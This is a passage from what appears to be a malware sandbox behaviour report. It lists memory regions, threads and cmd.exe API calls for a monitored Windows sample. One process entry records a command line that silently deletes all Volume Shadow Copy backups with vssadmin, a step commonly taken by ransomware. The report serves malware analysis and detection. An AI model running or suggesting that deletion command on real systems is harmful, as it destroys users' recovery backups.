	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1471
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1472
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1482
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1483
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 1484
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1485
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1495
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 1515
	        start_va = 0x440000
	          end_va = 0x47ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 1516
	        start_va = 0x480000
	          end_va = 0x4bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000480000"
	        filename = ""

Region:
	              id = 1517
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 1518
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1519
	        start_va = 0x4a60000
	          end_va = 0x4c0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a60000"
	        filename = ""

Region:
	              id = 1520
	        start_va = 0x5e0000
	          end_va = 0x767fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000005e0000"
	        filename = ""

Region:
	              id = 1521
	        start_va = 0x4880000
	          end_va = 0x48a9fff
	       monitored = 0
	     entry_point = 0x4885680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1522
	        start_va = 0x4960000
	          end_va = 0x4a5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004960000"
	        filename = ""

Region:
	              id = 1523
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1524
	        start_va = 0x4880000
	          end_va = 0x488cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 1525
	        start_va = 0x4a60000
	          end_va = 0x4be0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004a60000"
	        filename = ""

Region:
	              id = 1526
	        start_va = 0x4c00000
	          end_va = 0x4c0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004c00000"
	        filename = ""

Region:
	              id = 1527
	        start_va = 0x4c10000
	          end_va = 0x600ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004c10000"
	        filename = ""

Region:
	              id = 1528
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1529
	        start_va = 0x4c0000
	          end_va = 0x4c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004c0000"
	        filename = ""

Region:
	              id = 1530
	        start_va = 0x4890000
	          end_va = 0x4893fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 1535
	        start_va = 0x6010000
	          end_va = 0x60f9fff
	       monitored = 0
	     entry_point = 0x604d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1600
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 2307
	        start_va = 0x48a0000
	          end_va = 0x48a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048a0000"
	        filename = ""

Region:
	              id = 2308
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2309
	        start_va = 0x48b0000
	          end_va = 0x48b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048b0000"
	        filename = ""

Region:
	              id = 2396
	        start_va = 0x4d0000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004d0000"
	        filename = ""

Region:
	              id = 2397
	        start_va = 0x510000
	          end_va = 0x54ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000510000"
	        filename = ""

Region:
	              id = 2398
	        start_va = 0x550000
	          end_va = 0x58ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000550000"
	        filename = ""

Region:
	              id = 2399
	        start_va = 0x590000
	          end_va = 0x5cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000590000"
	        filename = ""

Region:
	              id = 2400
	        start_va = 0x770000
	          end_va = 0x7affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000770000"
	        filename = ""

Region:
	              id = 2401
	        start_va = 0x7b0000
	          end_va = 0x7effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007b0000"
	        filename = ""

Region:
	              id = 2497
	        start_va = 0x6010000
	          end_va = 0x60effff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 2505
	        start_va = 0x48c0000
	          end_va = 0x493ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048c0000"
	        filename = ""

Region:
	              id = 2506
	        start_va = 0x4940000
	          end_va = 0x4948fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 62
	os_tid = 0xf64


Thread:
	id = 71
	os_tid = 0xff0


Thread:
	id = 73
	os_tid = 0x980


Thread:
	id = 107
	os_tid = 0x12a8


Thread:
	id = 109
	os_tid = 0xb64


Thread:
	id = 110
	os_tid = 0x5f8


Process:
	id = "19"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x31828000"
	os_pid = "0xf68"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=T: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1305
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1306
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1307
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1308
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1309
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 1310
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 1311
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 1312
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 1313
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 1314
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1315
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 1316
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1317
	        start_va = 0x7f1a0000
	          end_va = 0x7f1c2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f1a0000"
	        filename = ""

Region:
	              id = 1318
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1319
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1320
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1321
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1322
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1347
	        start_va = 0x1c0000
	          end_va = 0x28ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1348
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1355
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1356
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1357
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1370
	        start_va = 0x4600000
	          end_va = 0x472ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 1371
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1379
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1380
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1381
	        start_va = 0x7f0a0000
	          end_va = 0x7f19ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f0a0000"
	        filename = ""

Region:
	              id = 1788
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1789
	        start_va = 0x280000
	          end_va = 0x28ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000280000"
	        filename = ""

Region:
	              id = 1790
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1791
	        start_va = 0x290000
	          end_va = 0x2cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000290000"
	        filename = ""

Region:
	              id = 1792
	        start_va = 0x4730000
	          end_va = 0x482ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004730000"
	        filename = ""

Region:
	              id = 1793
	        start_va = 0x4350000
	          end_va = 0x435ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1823
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 2028
	        start_va = 0x4370000
	          end_va = 0x4373fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004370000"
	        filename = ""

Region:
	              id = 2076
	        start_va = 0x4830000
	          end_va = 0x4b66fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 63
	os_tid = 0xf7c

	[0244.099] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0244.100] GetProcessHeap () returned 0x4630000
	[0244.100] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x400a) returned 0x463b8e0
	[0244.100] GetProcessHeap () returned 0x4630000
	[0244.100] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x463b8e0) returned 1
	[0244.102] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0244.102] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0244.102] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0244.102] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0244.103] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0244.103] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0244.103] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0244.103] GetProcessHeap () returned 0x4630000
	[0244.103] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x58) returned 0x4639000
	[0244.103] GetProcessHeap () returned 0x4630000
	[0244.103] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x1a) returned 0x4639060
	[0244.105] GetProcessHeap () returned 0x4630000
	[0244.105] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x52) returned 0x4639088
	[0244.107] GetConsoleTitleW (in: lpConsoleTitle=0x18f9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0244.374] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0244.375] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0244.376] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0244.377] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0244.378] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0244.379] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0244.379] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0244.379] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0244.379] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0244.379] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0244.379] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0244.379] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0244.380] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0244.381] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0244.381] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0244.382] GetProcessHeap () returned 0x4630000
	[0244.382] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x210) returned 0x46390e8
	[0244.382] GetProcessHeap () returned 0x4630000
	[0244.382] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x64) returned 0x4639300
	[0244.382] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0244.383] GetProcessHeap () returned 0x4630000
	[0244.383] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x418) returned 0x46305c8
	[0244.383] SetErrorMode (uMode=0x0) returned 0x0
	[0244.384] SetErrorMode (uMode=0x1) returned 0x0
	[0244.384] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46305d0, lpFilePart=0x18f4bc | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f4bc*="Desktop") returned 0x1d
	[0244.384] SetErrorMode (uMode=0x0) returned 0x1
	[0244.384] GetProcessHeap () returned 0x4630000
	[0244.384] RtlReAllocateHeap (Heap=0x4630000, Flags=0x0, Ptr=0x46305c8, Size=0x56) returned 0x46305c8
	[0244.384] GetProcessHeap () returned 0x4630000
	[0244.384] RtlSizeHeap (HeapHandle=0x4630000, Flags=0x0, MemoryPointer=0x46305c8) returned 0x56
	[0244.385] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0244.385] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0244.385] GetProcessHeap () returned 0x4630000
	[0244.385] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x182) returned 0x4639370
	[0244.385] GetProcessHeap () returned 0x4630000
	[0244.385] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x2fc) returned 0x4630628
	[0244.422] GetProcessHeap () returned 0x4630000
	[0244.422] RtlReAllocateHeap (Heap=0x4630000, Flags=0x0, Ptr=0x4630628, Size=0x184) returned 0x4630628
	[0244.422] GetProcessHeap () returned 0x4630000
	[0244.422] RtlSizeHeap (HeapHandle=0x4630000, Flags=0x0, MemoryPointer=0x4630628) returned 0x184
	[0244.422] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0244.422] GetProcessHeap () returned 0x4630000
